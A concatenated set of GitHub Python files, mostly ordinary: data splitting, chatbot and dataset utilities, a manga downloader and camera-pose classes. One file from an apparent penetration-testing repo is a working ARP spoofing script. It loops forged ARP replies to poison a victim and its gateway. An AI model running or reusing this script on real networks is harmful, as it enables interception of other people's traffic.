instances of the truth ;)')\n\n @classmethod\n def set(cls, key, value):\n # only names in the SOT definition are allowed\n if key not in cls.managed_names:\n raise RuntimeError(f'Attempt to set unexpected key {key} on {cls.__class__.__name__}')\n\n current_value = cls.managed_names[key]\n if current_value is None:\n # considered declared but uninitialized, OK to initialize with new value\n cls.managed_names[key] = value\n elif current_value != value:\n # Houston, we have a problem\n raise RuntimeError(f'Attempt to set {cls.__name__} key {key} to more than one value: '\n f'Existing value: {current_value}; Attempted Value: {value}')\n\n @classmethod\n def get(cls, name):\n # there should not be a default value\n return cls.managed_names[name]\n","repo_name":"dylrei/flowly","sub_path":"flowly/runtime/truth.py","file_name":"truth.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12345517246","text":"import os\nfrom scipy.io import wavfile\n\nroot = '.'\n\nduration = 4 # so giay\nlabels = ['normal', 'deep', 'strong', 'none']\nsource_dir = '{}/datawav_filter'.format(root)\ntrain_dir = '{}/data/training'.format(root)\ntest_dir = '{}/data/testing'.format(root)\n\n# kiem tra duong link da co hay chua\nassert not os.path.isdir(train_dir), \"Error! train_dir already exist - {}\".format(train_dir)\nassert not os.path.isdir(test_dir), \"Error! test_dir already exist - {}\".format(test_dir)\n\ntrain_spk = [\n \"01_male_23_BQuyen\",\n \"02_male_22_PTuan\",\n \"03_male_21_BDuong\",\n \"04_female_21_LAnh\",\n \"05_male_21_NLinh\",\n \"06_male_21_QViet\",\n\n \"07_male_21_MQuang\",\n \"08_male_21_TLong\",\n \"09_male_21_Ngon\",\n \"10_male_21_Nam\",\n \"11_female_21_Tam\",\n \"12_male_21_Tam\",\n \"13_female_20_TNhi\",\n \"14_male_21_Khanh\",\n\n \"15_female_21_PPhuong\",\n \"16_male_21_TTung\",\n \"17_male_21_Trung\",\n \"18_male_21_Hoa\",\n \"19_male_21_Minh_no-ok\",\n \"20_male_21_Viet\",\n \"21_male_21_Hai\",\n \"22_male_21_VHung\",\n \"23_male_21_CNDuong\",\n \"24_female_21_MPham\",\n \"25_famale_21_TCuc_sickness\",\n \"26_female_19_Linh\",\n\n]\n\ntest_spk = [\n \"27_female_19_TThanh\",\n \"28_male_19_VHoa_asthma\",\n \"29_male_19_Cong\",\n]\n\n#tao duong dan lay label\nfor label in labels:\n indir = os.path.join(source_dir, label)\n outdir_train = os.path.join(train_dir, label)\n outdir_test = os.path.join(test_dir, label)\n assert os.path.exists(indir), \"Error! {} not found\".format(indir)\n os.makedirs(outdir_train) #tao folder\n os.makedirs(outdir_test)\n for f in os.listdir(indir):\n if \".wav\" in f:\n infile = os.path.join(indir, f) #tao dg dan den file\n #tach data 4s 1 vs data la so die du lieu\n\n rate, data = wavfile.read(infile)\n if len(data) == duration * rate:\n spk = \"_\".join(f.replace(\".wav\", \"\").split(\"_\")[:-2])\n if spk in train_spk:\n outfile = os.path.join(outdir_train, f) # tao ten link\n os.symlink(os.path.realpath(infile), outfile) # tao sort cut\n print(os.path.realpath(infile), outfile)\n elif spk in test_spk:\n outfile = os.path.join(outdir_test, f)\n\n os.symlink(os.path.realpath(infile), outfile)\n print(os.path.realpath(infile), outfile)","repo_name":"PhungHaThiKim/SouthDetection","sub_path":"splitdata.py","file_name":"splitdata.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12257871667","text":"import ast\nimport importlib\nimport json\nimport os\nimport sys\n\nfrom . import Env, ENVS_RESULT_FILENAME\n\nVAR_TYPES = Env.valid_types.keys()\n\nif sys.version_info >= (3, 0):\n raw_input = input\n\ndef import_util(imp):\n \"\"\"\n Lazily imports a utils (class,\n function,or variable) from a module) from\n a string.\n @param imp:\n \"\"\"\n\n mod_name, obj_name = imp.rsplit('.', 1)\n mod = importlib.import_module(mod_name)\n return getattr(mod, obj_name)\n\n\ndef convert_module(module):\n attr_list = []\n for k, v in module.__dict__.items():\n if k.isupper():\n convert = bool(int(raw_input('Convert {}? (1=True,0=False): '.format(k))))\n attr_dict = {'name': k, 'convert': convert}\n default_val = None\n if convert:\n\n default_val = raw_input('Default Value? (default: {}): '.format(v))\n if default_val:\n default_val = ast.literal_eval(default_val)\n if not default_val:\n default_val = v\n attr_dict['default_val'] = default_val\n\n var_type = raw_input('Variable Type Choices (ex. boolean,string,list,tuple,integer,float,dict): ')\n if not var_type in VAR_TYPES:\n raise ValueError('{} not in {}'.format(var_type, VAR_TYPES))\n attr_dict['var_type'] = var_type\n if not default_val:\n default_val = v\n attr_list.append(attr_dict)\n return attr_list\n\n\ndef import_mod(module):\n if sys.version_info.major == 3:\n try:\n m = importlib.import_module(module)\n except ModuleNotFoundError:\n sys.path.insert(0, os.getcwd())\n m = importlib.import_module(module)\n else:\n try:\n m = importlib.import_module(module)\n except ImportError:\n sys.path.insert(0, os.getcwd())\n m = importlib.import_module(module)\n return m\n\n\ndef list_envs_module(module):\n with open(ENVS_RESULT_FILENAME, 'w+') as f:\n f.write('[')\n import_mod(module)\n with open(ENVS_RESULT_FILENAME, 'a') as f:\n f.write('{}]')\n with open(ENVS_RESULT_FILENAME, 'r') as f:\n envs_result = json.load(f)\n envs_result.pop()\n return envs_result\n","repo_name":"capless/envs","sub_path":"envs/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"19291317823","text":"import socket\nimport struct\nimport binascii\ns = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.htons(0x0003))\ns.bind((\"ens33\", socket.htons(0x0003)))\n\nsor = b'\\x00\\x50\\x56\\x29\\x6c\\x85'\n\nvictmac = b'\\x00\\x0c\\x29\\xdb\\x9a\\xb2'\n\ngatemac = b'\\x00\\x50\\x56\\xc0\\x00\\x02'\ncode = b'\\x08\\x06'\neth1 = victmac+sor+code #for victim\neth2 = gatemac+sor+code # for gateway\nprint (eth1)\nhtype = b'\\x00\\x01'\nprotype = b'\\x08\\x00'\nhsize = b'\\x06'\npsize = b'\\x04'\nopcode = b'\\x00\\x02'\n\ngate_ip = '192.168.21.1'\nvictim_ip = '192.168.21.141' \ngip = socket.inet_aton ( gate_ip )\nvip = socket.inet_aton ( victim_ip )\n\n\narp_victim = eth1+htype+protype+hsize+psize+opcode+sor+gip+victmac+vip\narp_gateway= eth2+htype+protype+hsize+psize+opcode+sor+vip+gatemac+gip\n\n\nwhile 1:\n\ts.send(arp_victim)\n\ts.send(arp_gateway)\n\n\n","repo_name":"mohitraj/Network-Penetration-testing","sub_path":"tcp1/arpsp1.py","file_name":"arpsp1.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37358215805","text":"\"\"\"\nhttps://leetcode.com/problems/climbing-stairs/\n@date: 2021-08-25\n\"\"\"\n\n\nclass Solution:\n def climbStairs(self, n: int) -> int:\n if n == 1:\n return 1\n if n == 2:\n return 2\n\n a, b = 1, 2\n for i in range(0, n - 2):\n a, b = b, a + b\n return b\n\n\nif __name__ == '__main__':\n solution = Solution()\n print(solution.climbStairs(5))\n","repo_name":"ZhouLihua/leetcode","sub_path":"climbingStairs.py","file_name":"climbingStairs.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6795885784","text":"import requests\nfrom lxml import etree\nfrom selenium import webdriver\nimport os\nimport zipfile\n\ndef search():\n print('搜索:')\n kw_search = input()\n url_search = 'https://www.dmzj.com/dynamic/o_search/index/' + kw_search\n result_search = requests.get(url_search)\n if '很遗憾,您搜索的内容暂时没有找到。' in result_search.text:\n print('很遗憾,您搜索的内容暂时没有找到。')\n else:\n tree_search = etree.HTML(result_search.text)\n page_search = tree_search.xpath\\\n ('//div[@class=\"bottom_page page\"]/a[text()!=\"上一页\"][text()!=\"下一页\"]/text()')\n print('共' + str(len(page_search)) + '页搜索结果')\n print('输入页数:')\n i_page_search = int(input()) - 1\n\n if i_page_search in range(0,len(page_search)):\n result_search = requests.get(url_search + '/' + page_search[i_page_search])\n print('第' + page_search[i_page_search] + '页')\n print()\n tree_search = etree.HTML(result_search.text)\n global title_search\n title_search = tree_search.xpath('//ul[@class=\"update_con autoHeight\"]/li/a/@title')\n latest_search = tree_search.xpath('//p[@class=\"newPage\"]/text()')\n global link_search\n link_search = tree_search.xpath('//ul[@class=\"update_con autoHeight\"]/li/a/@href')\n for i_comic in range(0,len(title_search)):\n print(i_comic + 1)\n print(title_search[i_comic] + ' ' + latest_search[i_comic])\n print()\n global input_i_comic\n print('输入漫画序号:')\n input_i_comic = int(input()) - 1\n else:\n print('该页没有搜索结果')\n\ndef comic():\n print(title_search[input_i_comic])\n print()\n response_comic = requests.get(link_search[input_i_comic])\n if '4004.gif' in response_comic.text:\n print('因版权等原因暂停提供')\n input()\n exit()\n else:\n tree_comic = etree.HTML(response_comic.text)\n global title_volume\n global link_volume\n title_volume = tree_comic.xpath('//div[@class=\"cartoon_online_border\"]/ul/li/a/text()')\n link_volume = tree_comic.xpath('//div[@class=\"cartoon_online_border\"]/ul/li/a/@href')\n\n for i_volume in range(0,len(title_volume)):\n print(i_volume + 1)\n print(title_volume[i_volume])\n print()\n\n global input_i_volume\n print('输入卷数:')\n input_i_volume = int(input()) - 1\n\ndef images():\n dir_comic = title_search[input_i_comic].replace('/', ' ')\n if not os.path.exists(dir_comic):\n os.mkdir(dir_comic)\n os.chdir(dir_comic)\n\n print(title_volume[input_i_volume])\n print()\n print('正在下载...')\n browser = webdriver.PhantomJS()\n browser.get('http://manhua.dmzj.com' + link_volume[input_i_volume])\n tree_volume = etree.HTML(browser.page_source)\n url_image = tree_volume.xpath('//select[@id=\"page_select\"]/option/@value')\n\n dir_volume = title_volume[input_i_volume].replace('/', ' ')\n if not os.path.exists(dir_volume):\n os.mkdir(dir_volume)\n else:\n exit()\n os.chdir(dir_volume)\n headers = {'Referer':'http://manhua.dmzj.com' + link_volume[input_i_volume]}\n\n name_image = []\n for i_image in range(0,len(url_image)):\n name_image.append(str(i_image) + '.jpg')\n get_image = requests.get(url_image[i_image], headers = headers)\n with open(name_image[i_image], 'wb') as fd:\n fd.write(get_image.content)\n\n os.chdir(os.path.dirname(os.path.abspath('.')))\n zip_volume = zipfile.ZipFile(dir_volume + '.zip', 'w')\n for i_image in range(0,len(url_image)):\n zip_volume.write('./' + dir_volume + '/' + name_image[i_image])\n\n print()\n print('下载完毕\\n')\n\n\nprint('=' * 30)\nprint('动漫之家下载工具 Beta 1.0')\nprint('ssjgoku制作')\nprint('2017年11月4日')\nprint('输入\"q\"退出程序')\nprint('=' * 30)\nprint()\nif input() == 'q':\n exit()\nelse:\n search()\n comic()\n if not os.path.exists('download'):\n os.mkdir('download')\n os.chdir('download')\n images()","repo_name":"h4ckm310n/pwxssj.github.io","sub_path":"dmzj_crawler/dmzj_crawler.py","file_name":"dmzj_crawler.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11320559927","text":"import string\nimport logging\nfrom typing import Tuple, Callable, List\n\n\nclass OpenAIChatbot():\n ROLE_SYSTEM = \"system\"\n ROLE_USER = \"user\"\n ROLE_ASSISTANT = \"assistant\"\n\n def __init__(\n self,\n openai,\n initial_prompt: str,\n output_callback: Callable[[str], None],\n names: Tuple[str, str] = (\"AI\", \"Human\"),\n end_token: str = \"END\",\n openai_model: str = \"text-davinci-003\",\n openai_endpoint: str = \"completions\"\n ):\n self.openai = openai\n self.initial_prompt = initial_prompt\n self.output_callback = output_callback\n self.names = names\n self.end_token = end_token\n self.openai_model = openai_model\n self.openai_endpoint = openai_endpoint\n\n self.prompt = None\n self.stop = [f\"{name}:\" for name in names]\n\n def start_session(self):\n self.prompt = self.initial_prompt\n logging.debug(f\"Starting chatbot session with prompt:\\n{self.prompt}\")\n self._get_all_utterances()\n\n def send_responses(self, responses: List[str]):\n if self.prompt is None:\n raise RuntimeError(\"Chatbot session is not active\")\n\n for response in responses:\n self._add_response(self.names[1], response.strip())\n\n self._get_all_utterances()\n\n def session_ended(self) -> bool:\n return self.prompt is None\n\n def _add_response(self, name: str, response: str):\n log_response = f\"{name}: {response}\"\n logging.debug(f\"Adding response: {repr(log_response)}\")\n self.prompt += f\"\\n{name}: {response}\"\n\n def _get_all_utterances(self):\n utterance = self._get_next_utterance()\n\n if utterance:\n self.output_callback(utterance)\n\n if self.prompt is not None:\n self.prompt = f\"{self.prompt} {utterance}\"\n\n def _get_next_utterance(self) -> str:\n self.prompt += f\"\\n{self.names[0]}:\"\n\n openai_params = {\n \"max_tokens\": 150,\n \"stop\": self.stop,\n \"temperature\": 0.9\n }\n\n if self.openai_endpoint == \"completions\":\n completion = self.openai.Completion.create(\n model=self.openai_model,\n prompt=self.prompt,\n **openai_params\n )\n utterance = completion.choices[0][\"text\"]\n elif self.openai_endpoint == \"chat\":\n completion = self.openai.ChatCompletion.create(\n model=self.openai_model,\n messages=[{\"role\": self.ROLE_SYSTEM, \"content\": self.prompt}],\n **openai_params\n )\n utterance = completion['choices'][0]['message']['content']\n\n utterance = utterance.strip(string.whitespace + '\"')\n logging.debug(f\"Got utterance: {repr(utterance)}\")\n\n end_token_pos = utterance.find(self.end_token)\n if end_token_pos != -1:\n utterance = utterance[:end_token_pos].strip()\n # Ending the session\n self.prompt = None\n\n return utterance\n","repo_name":"artmatsak/grace","sub_path":"openai_chatbot.py","file_name":"openai_chatbot.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"61"} +{"seq_id":"9606446203","text":"import pandas as pd\nimport global_variables as v\nimport statistics\n\ndef run_word_counter(preprocessed_rows):\n\n count_list = []\n\n for index, row in preprocessed_rows.iterrows(): # for each record in data file\n tokens = row['transformedtokens'].strip().split(' ')\n print(tokens)\n\n token_count = len(tokens)\n count_list.append(token_count)\n\n print('maximum length: ' + str(max(count_list)))\n print('mean no. of words: ' + str(sum(count_list) / len(count_list) ))\n print('standard deviation ' + str(statistics.stdev(count_list)))\n\ndef main():\n\n print(\"Starting Pipeline Validation\")\n\n print(\"Validating Maintenance Item Tagged Records\")\n data = pd.read_excel(v.transformed_text_path_stage_4, sheet_name=v.input_file_sheet_name)\n run_word_counter(data)\n\n print(\"Validation Finished\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"uwasystemhealth/Maintenance_Work_Order_Processing_Pipeline_Public","sub_path":"src/word_analysis.py","file_name":"word_analysis.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23378519961","text":"#!/usr/bin/env python\r\n# -*- coding: UTF-8 -*-\r\n__author__ = \"Régis Décamps\"\r\n\r\nimport sys\r\n\r\ndef read_input(file):\r\n matrix = []\r\n for i in range(4):\r\n line = file.readline()\r\n # remove leading \\n\r\n matrix.append(line.strip())\r\n return matrix\r\n\r\n\r\ndef has_won(player, matrix):\r\n return has_won_h(player, matrix) or has_won_v(player, matrix) or has_won_d(player, matrix)\r\n\r\n\r\ndef has_won_h(player, matrix):\r\n for i in range(4):\r\n placed = sum((1 if (matrix[i][j]==player or matrix[i][j]=='T') else 0 for j in range(4)))\r\n if placed==4:\r\n return True\r\n return False\r\n\r\n\r\ndef has_won_v(player, matrix):\r\n for j in range(4):\r\n placed = sum((1 if (matrix[i][j]==player or matrix[i][j]=='T') else 0 for i in range(4)))\r\n if placed==4:\r\n return True\r\n return False\r\n\r\n\r\ndef has_won_d(player, matrix):\r\n return has_won_d1(player, matrix) or has_won_d2(player, matrix)\r\n\r\n\r\ndef has_won_d1(player, matrix):\r\n for i in range(4):\r\n if matrix[i][i] != player and matrix[i][i] != 'T':\r\n return False\r\n return True\r\n\r\n\r\ndef has_won_d2(player, matrix):\r\n for i in range(4):\r\n j = 3 - i\r\n if matrix[i][j] != player and matrix[i][j] != 'T':\r\n return False\r\n return True\r\n\r\n\r\ndef game_not_completed(matrix):\r\n for line in matrix:\r\n if '.' in line:\r\n return True\r\n return False\r\n\r\n\r\nif __name__ == '__main__':\r\n with open(sys.argv[1]) as f:\r\n nb_games = int(f.readline()) + 1\r\n for i in range(1, nb_games):\r\n matrix = read_input(f)\r\n\r\n if has_won('O', matrix):\r\n print(\"Case #{i}: O won\".format(i=i))\r\n elif has_won('X', matrix):\r\n print(\"Case #{i}: X won\".format(i=i))\r\n elif game_not_completed(matrix):\r\n print(\"Case #{i}: Game has not completed\".format(i=i))\r\n else:\r\n print(\"Case #{i}: Draw\".format(i=i))\r\n #empty line\r\n if i < nb_games:\r\n f.readline()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_116/1194.py","file_name":"1194.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2480181527","text":"import matplotlib.pyplot as plt\nimport torch\n\nccm = torch.tensor([[1655, -442, -189], [-248, 1466, -194], [-48, -770, 1842]], dtype=torch.float32)\nrgb_data = torch.randint(0, 255, (3, 100))\nrgb_data = rgb_data.float()\n\nrgb_target = ccm.mm(rgb_data)/1024.0\n\nfig1 = plt.figure(1)\nax1 = fig1.add_subplot(111, projection='3d')\nx2 = rgb_data[0]\ny2 = rgb_data[1]\nz2 = rgb_data[2]\n\nax1.scatter(x2, y2, z2, marker='*', c='b', label='origin RGB')\n\nax1.set_xlim(-80, 360)\nax1.set_ylim(-80, 360)\nax1.set_zlim(-80, 360)\nax1.set_xlabel('R')\nax1.set_ylabel('G')\nax1.set_zlabel('B')\n\nx3 = rgb_target[0]\ny3 = rgb_target[1]\nz3 = rgb_target[2]\n\nax1.scatter(x3, y3, z3, marker='o', c='c', label='target rgb')\n\nfor i in range(len(x3)):\n ax1.plot([x2[i], x3[i]], [y2[i], y3[i]], [z2[i], z3[i]], 'k-.')\nax1.legend()\n\nplt.show()","repo_name":"luimoli/ColorCheckerCailibration_experiment","sub_path":"Spatial/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40784815947","text":"\"\"\"\nDataclass extensions required for drone movement planning.\n\n\"\"\"\nfrom dataclasses import dataclass\nfrom pathlib import Path\n\nimport numpy as np\nimport numpy.typing as npt\nimport pandas as pd\nimport torch\nfrom scipy.spatial.transform import Rotation as R\nfrom typing_extensions import Self\n\nfrom sips.data import CameraPose\n\n__all__ = [\"Movement\", \"MovableCameraPose\", \"CameraPoseTracker\"]\n\n\n@dataclass\nclass Movement:\n \"\"\"\n Incorporates a relative movement (translation and rotation).\n \"\"\"\n\n surge: float\n sway: float\n heave: float\n roll: float\n pitch: float\n yaw: float\n degrees: bool = True\n\n def __post_init__(self) -> None:\n if self.degrees:\n return\n\n # Enforce degrees\n self.roll *= 180 / np.pi\n self.pitch *= 180 / np.pi\n self.yaw *= 180 / np.pi\n self.degrees = True\n\n def as_dict(self, units: bool = True, length_unit: str = \"m\") -> dict[str, float]:\n lu = au = \"\"\n if units:\n lu = f\"[{length_unit}]\" # length unit\n au = \"[deg]\" # angle unit\n\n translation = {\n f\"surge{lu}\": self.surge,\n f\"sway{lu}\": self.sway,\n f\"heave{lu}\": self.heave,\n }\n rotation = {\n f\"roll{au}\": self.roll,\n f\"pitch{au}\": self.pitch,\n f\"yaw{au}\": self.yaw,\n }\n return {**translation, **rotation}\n\n\nclass MovableCameraPose(CameraPose):\n \"\"\"\n Incorporates camera position and orientation and is movable with relative movements.\n \"\"\"\n\n @classmethod\n def neutral_pose(cls) -> \"MovableCameraPose\":\n return cls((0, 0, 0), (0, 0, 0, 1))\n\n def translate(self, dists: npt.ArrayLike) -> None:\n dists = np.asarray(dists)\n assert dists.shape == (3,), \"Invalid dimensions\"\n self.position += dists\n\n def surge(self, dist: float) -> Self:\n self.translate(R.from_quat(self.rotation).apply([dist, 0, 0]))\n return self\n\n def sway(self, dist: float) -> Self:\n self.translate(R.from_quat(self.rotation).apply([0, dist, 0]))\n return self\n\n def heave(self, dist: float) -> Self:\n self.translate(R.from_quat(self.rotation).apply([0, 0, dist]))\n return self\n\n def rotate(self, angles: npt.ArrayLike, degrees: bool = True) -> None:\n angles = np.asarray(angles)\n rot = R.from_rotvec(angles, degrees=degrees) # type: ignore\n\n self.rotation[:] = torch.from_numpy(\n (R.from_quat(self.rotation) * rot).as_quat()\n )\n\n def roll(self, angle: float, degrees: bool = True) -> Self:\n self.rotate([angle, 0, 0], degrees=degrees)\n return self\n\n def pitch(self, angle: float, degrees: bool = True) -> Self:\n self.rotate([0, angle, 0], degrees=degrees)\n return self\n\n def yaw(self, angle: float, degrees: bool = True) -> Self:\n self.rotate([0, 0, angle], degrees=degrees)\n return self\n\n def copy(self) -> \"MovableCameraPose\":\n return MovableCameraPose(self.position.clone(), self.rotation.clone())\n\n\nclass CameraPoseTracker:\n \"\"\"\n Keeps track of the movement history of camera poses.\n\n Parameters\n ----------\n init_pose : MovableCameraPose | None\n Initial pose. If None, a neutral pose will be used.\n \"\"\"\n\n def __init__(self, init_pose: MovableCameraPose | None = None) -> None:\n if init_pose is None:\n init_pose = MovableCameraPose.neutral_pose()\n\n self.abs_history: list[MovableCameraPose] = [init_pose]\n self.rel_history: list[Movement] = [Movement(0, 0, 0, 0, 0, 0)]\n\n def __len__(self) -> int:\n assert len(self.abs_history) == len(self.rel_history)\n return len(self.abs_history)\n\n def __getitem__(self, ix: int) -> tuple[MovableCameraPose, Movement]:\n return self.abs_history[ix], self.rel_history[ix]\n\n def __iter__(self) -> Self:\n self._current_index = 0\n return self\n\n def __next__(self) -> tuple[MovableCameraPose, Movement]:\n ix = self._current_index\n if ix > len(self) - 1:\n raise StopIteration\n self._current_index += 1\n return self[ix]\n\n # ----------------------------------------------------------------------\n # Transformations\n\n def move(\n self,\n surge: float = 0,\n sway: float = 0,\n heave: float = 0,\n roll: float = 0,\n pitch: float = 0,\n yaw: float = 0,\n degrees: bool = True,\n ) -> Self:\n \"\"\"\n Movements relative to the camera's orientation.\n\n \"\"\"\n curr_pose = self.abs_history[-1]\n next_pose = curr_pose.copy()\n # Apply transformation\n next_pose.surge(surge).sway(sway).heave(heave)\n next_pose.roll(roll, degrees).pitch(pitch, degrees).yaw(yaw, degrees)\n # Append to history\n self.abs_history.append(next_pose)\n self.rel_history.append(Movement(surge, sway, heave, roll, pitch, yaw, degrees))\n return self\n\n # ----------------------------------------------------------------------\n # Utils\n\n def get_pos_limits(self) -> tuple[tuple[float, float], ...]:\n xyz_arr = [pose.position.numpy() for pose in self.abs_history]\n xyz_mins = np.array(xyz_arr).min(0)\n xyz_maxs = np.array(xyz_arr).max(0)\n\n return tuple(zip(xyz_mins, xyz_maxs))\n\n # ----------------------------------------------------------------------\n # Export\n\n def to_pandas(self, add_units: bool = True) -> pd.DataFrame:\n df = pd.DataFrame([p.as_dict(units=add_units) for p in self.rel_history])\n return df\n\n def to_csv(\n self,\n filepath: str | Path,\n sep: str = \",\",\n add_units: bool = True,\n ) -> None:\n self.to_pandas(add_units=add_units).to_csv(filepath, index=False, sep=sep)\n","repo_name":"tstreule/SIPS","sub_path":"drone_movements/_data.py","file_name":"_data.py","file_ext":"py","file_size_in_byte":5831,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"8316459456","text":"import pandas as pd\nimport utils.general as ut\nimport variables.type as tp\nimport variables.var_column as clmn\nimport variables.DIAGEO_setup.dashboard as dash\nimport variables.DIAGEO_setup.my_dict as stp_dct\nfrom Dataset import Raw, Matrix\nimport variables.dict as dct\nimport copy\n\n\ndef load_volume(actual_initial_date, any_stp_dict, previous_archive_volume_to_be_loaded=False,\n archive_initial_date=pd.Timestamp(year=1900, month=1, day=1),\n actual_end_date=pd.Timestamp(year=2099, month=12, day=31)):\n [mtx_nomenclature, mtx_uom_conversion, mtx_part_number] = Matrix.DataMatrix.load_old_object_list(\n ['nomenclature', 'uom_conversion',\n 'part_number'], any_stp_dict)\n mtx_volume = Matrix.DataMatrix.load_from_json('volume', root=any_stp_dict[dct.root_folder],\n folder=any_stp_dict[dct.json_folder])\n mtx_volume_actual = copy.deepcopy(mtx_volume)\n mtx_volume_actual.load_dataframe(any_raw_dataset_name_list=['volume_actual'],\n any_mtx_nomenclature=mtx_nomenclature, any_mtx_uom_conversion=mtx_uom_conversion,\n any_mtx_part_number=mtx_part_number, root_json=any_stp_dict[dct.root_folder],\n folder_json=any_stp_dict[dct.json_folder], key_clmn=clmn.part_number_code)\n mtx_volume_actual.trim_date(initial_date=actual_initial_date,\n end_date=actual_end_date,\n date_clmn=clmn.date, reset_index=True)\n mtx_volume.concat_datamatrix(mtx_volume_actual)\n\n if previous_archive_volume_to_be_loaded:\n print('volume 31')\n else:\n mtx_volume_archive = copy.deepcopy(mtx_volume)\n mtx_volume_archive.load_dataframe_from_family(base_dataset_family_name='volume_legacy',\n any_stp_dict=any_stp_dict, any_mtx_nomenclature=mtx_nomenclature,\n any_mtx_uom_conversion=mtx_uom_conversion,\n any_mtx_part_number=mtx_part_number,\n treat_date=False, load_all_files_within_folder=True,\n load_all_sheets_on_spreadsheet=False,\n key_clmn=clmn.part_number_code)\n mtx_volume_archive.trim_date(initial_date=actual_initial_date,\n end_date=actual_end_date,\n date_clmn=clmn.date, reset_index=True)\n mtx_volume.concat_datamatrix(mtx_volume_archive)\n\n\n # if archive_volume_to_be_loaded:\n # mtx_volume_archive = Matrix.DataMatrix.load_old_object('volume', any_stp_dict= any_stp_dict, is_for_archive=True)\n # mtx_volume_archive.filter_based_on_column(any_column=clmn.is_forecast, value_list=[False],\n # keep_value_in=True)\n # mtx_volume_archive.trim_date(initial_date=archive_initial_date,\n # end_date=refresh_initial_date - pd.DateOffset(days=1),\n # date_clmn=clmn.date, reset_index=True)\n # mtx_volume.concat_base_dataset(mtx_volume_archive)\n\n if mtx_volume.get_row_number() > 0:\n mtx_volume.assure_column_integrity()\n mtx_volume.write(any_stp_dict, save_dataframe=True, save_error=True)\n\n return\n\n\nif __name__ == \"__main__\":\n pd.set_option('display.max_columns', 30)\n pd.set_option('display.max_rows', 70000)\n load_volume(any_stp_dict=stp_dct.setup_dict,\n previous_archive_volume_to_be_loaded=dash.previous_archive_volume_to_be_loaded,\n archive_initial_date=dash.archive_initial_date,\n actual_initial_date=dash.actual_initial_date,\n actual_end_date=dash.actual_end_date)\n\n# Trim dates for lagged dataframe, new historical, forecast\n# Date sampling\n# Add forecast\n\n\n\n\n\n","repo_name":"mmvn23/spreadsheetGrinder","sub_path":"processing/DIAGEO/volume.py","file_name":"volume.py","file_ext":"py","file_size_in_byte":4210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14130558208","text":"from torch.utils.data import Dataset\nimport torch \nimport random\nimport os \nimport numpy as np\nimport json\nimport pandas as pd\n\ndef load_imdb_dataset(data_path, seed=123):\n \"\"\"Loads the IMDb movie reviews sentiment analysis dataset.\n\n # Arguments\n data_path: string, path to the data directory.\n seed: int, seed for randomizer.\n\n # Returns\n A tuple of training, unlabeled, and test data.\n\n # References\n Mass et al., http://www.aclweb.org/anthology/P11-1015\n\n Download and uncompress archive from:\n http://ai.stanford.edu/~amaas/data/sentiment/aclImdb_v1.tar.gz\n \"\"\"\n imdb_data_path = os.path.join(data_path, 'aclImdb')\n\n # Load the training data\n train_texts = []\n train_labels = []\n for category in ['pos', 'neg']:\n train_path = os.path.join(imdb_data_path, 'train', category)\n for fname in sorted(os.listdir(train_path)):\n if fname.endswith('.txt'):\n with open(os.path.join(train_path, fname), encoding='utf-8') as f:\n train_texts.append(f.read())\n train_labels.append(0 if category == 'neg' else 1)\n \n # Load the unsupervised data\n unlabeled_texts = []\n unlabeled_labels = [] # all -1\n unsup_path = os.path.join(imdb_data_path, 'train', 'unsup')\n for fname in sorted(os.listdir(unsup_path)):\n if fname.endswith('.txt'):\n with open(os.path.join(unsup_path, fname)) as f:\n unlabeled_texts.append(f.read())\n unlabeled_labels.append(-1)\n\n # Load the test data.\n test_texts = []\n test_labels = []\n for category in ['pos', 'neg']:\n test_path = os.path.join(imdb_data_path, 'test', category)\n for fname in sorted(os.listdir(test_path)):\n if fname.endswith('.txt'):\n with open(os.path.join(test_path, fname)) as f:\n test_texts.append(f.read())\n test_labels.append(0 if category == 'neg' else 1)\n\n # Shuffle the training data and labels.\n random.seed(seed)\n random.shuffle(train_texts)\n random.seed(seed)\n random.shuffle(train_labels)\n\n return ((train_texts, np.array(train_labels)),\n (unlabeled_texts, np.array(unlabeled_labels)),\n (test_texts, np.array(test_labels)))\n\ndef load_sst2_dataset(data_path, seed=123):\n sst2_data_path = os.path.join(data_path, 'SST-2')\n\n # Load training data -> unlabeled will come from here\n train_texts = []\n train_labels = []\n train_text_path = os.path.join(sst2_data_path, 'sst2_train_sentences.txt')\n with open(train_text_path, encoding='utf-8') as f:\n texts = f.read()\n result = [text for text in texts.split('\\n')]\n result = result[:-1]\n train_texts = [element.strip() for element in result]\n \n train_label_path = os.path.join(sst2_data_path, 'sst2_train_labels.txt')\n with open(train_label_path, encoding='utf-8') as f:\n labels = f.read()\n result = [label for label in labels.split('\\n')]\n result = result[:-1]\n train_labels = [int(element) for element in result]\n\n # Load test data\n test_texts = []\n test_labels = []\n test_text_path = os.path.join(sst2_data_path, 'sst2_test_sentences.txt')\n with 